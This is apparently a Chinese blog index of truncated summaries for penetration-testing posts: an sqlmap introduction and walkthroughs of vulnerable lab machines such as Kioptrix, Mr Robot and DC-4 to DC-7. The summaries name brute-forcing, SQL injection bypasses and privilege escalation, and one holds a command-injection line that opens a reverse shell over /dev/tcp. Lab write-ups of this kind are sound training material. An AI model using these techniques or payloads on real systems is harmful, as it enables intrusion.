摘要:
> 原文地址 zhuanlan.zhihu.com 一、Sqlmap 简介 开源的 SQL 注入漏洞检测的工具,能够检测动态页面中的 get/post 参数,cookie,http 头,还能够查看数据,文件系统访问,甚至能够操作系统命令执行。 检测方式:布尔盲注、时间盲注、报错注入、UNION 联 阅读全文
摘要:
# kioprtix level 1.2 存活探测+端口扫描 访问80 同时做一个目录扫描 发现 http://10.0.4.18/phpmyadmin/index.php 指纹识别 cms漏洞查找 测试代码执行,存在漏洞 反弹shell github找到poc git clone https:/ 阅读全文
摘要:
# kioptrix level-1.1 存活检测 端口扫描 80访问 查看源代码 尝试爆破,先试一下,无结果 尝试万能密码,sql注入 万能密码可以绕过登录 替换数据包进行登录 登录成功 命令执行 反弹shell 127.0.0.1 | bash -i >& /dev/tcp/192.168.2 阅读全文
摘要:
# kioptrix 存活探测 端口扫描 服务识别 可测试139 目录扫描 没什么可利用的 139端口渗透 使用msf查询靶机samba版本 msf6 > search smb_version Matching Modules # Name Disclosure Date Rank Check D 阅读全文
摘要:
# Myrebot 存活探测 端口扫描 开放80 22 443 访问80 访问页面 是一个命令行界面,输入提示的join,看到如下的界面 习惯性看一下源码,看到这些,应该是wordpress的网站 目录扫描 sudo dirsearch -u http://10.0.4.17 -e * 存在的页面 阅读全文
摘要:
DC-7 存活探测 端口扫描 访问80 百度得知入口点 github搜索 ssh登陆 mbox邮件 backup gpg未某种加密方式的文件 backup.sh 更改密码 Drupal 使用Drush是专门服务于drupal的第三方模块。使用drush 来更改admin用户的密码 登录 利用 蚁剑连 阅读全文
摘要:
DC-6 发现主机 扫描主机 80服务 WordPress扫描 默认后台 制作字典爆破 wpscan扫描用户 开始爆破 登陆后台 考虑插件漏洞 利用 反弹shell 交互式 graham密码 ssh登陆graham 脚本写入 jens无密码执行 反弹gens的shell 交互式 python -c 阅读全文
摘要:
DC-5 存活探测 端口扫描 从80入手 conract提交后,发现日期有变化,并且参数变量可控,猜测文件包含 尝试包含/etc/passwd 从日志文件入手 尝试写入shell 失败了很多次,恢复快照后,ip变了 反弹shell 返回交互式 中途断了一次,换了端口 python反弹 提权(/bin 阅读全文
摘要:
DC-4 主机存活探测 扫描 访问80 爆破http http登陆 抓包 可以执行系统命令 尝试反弹shell 返回交互式命令行 另外途径 看到三个用户,可以用来爆破 制作字典 ssh爆破 登陆 var/mail看到charles的密码 切换到charles teehee提权 操作过程如下: 1、e 阅读全文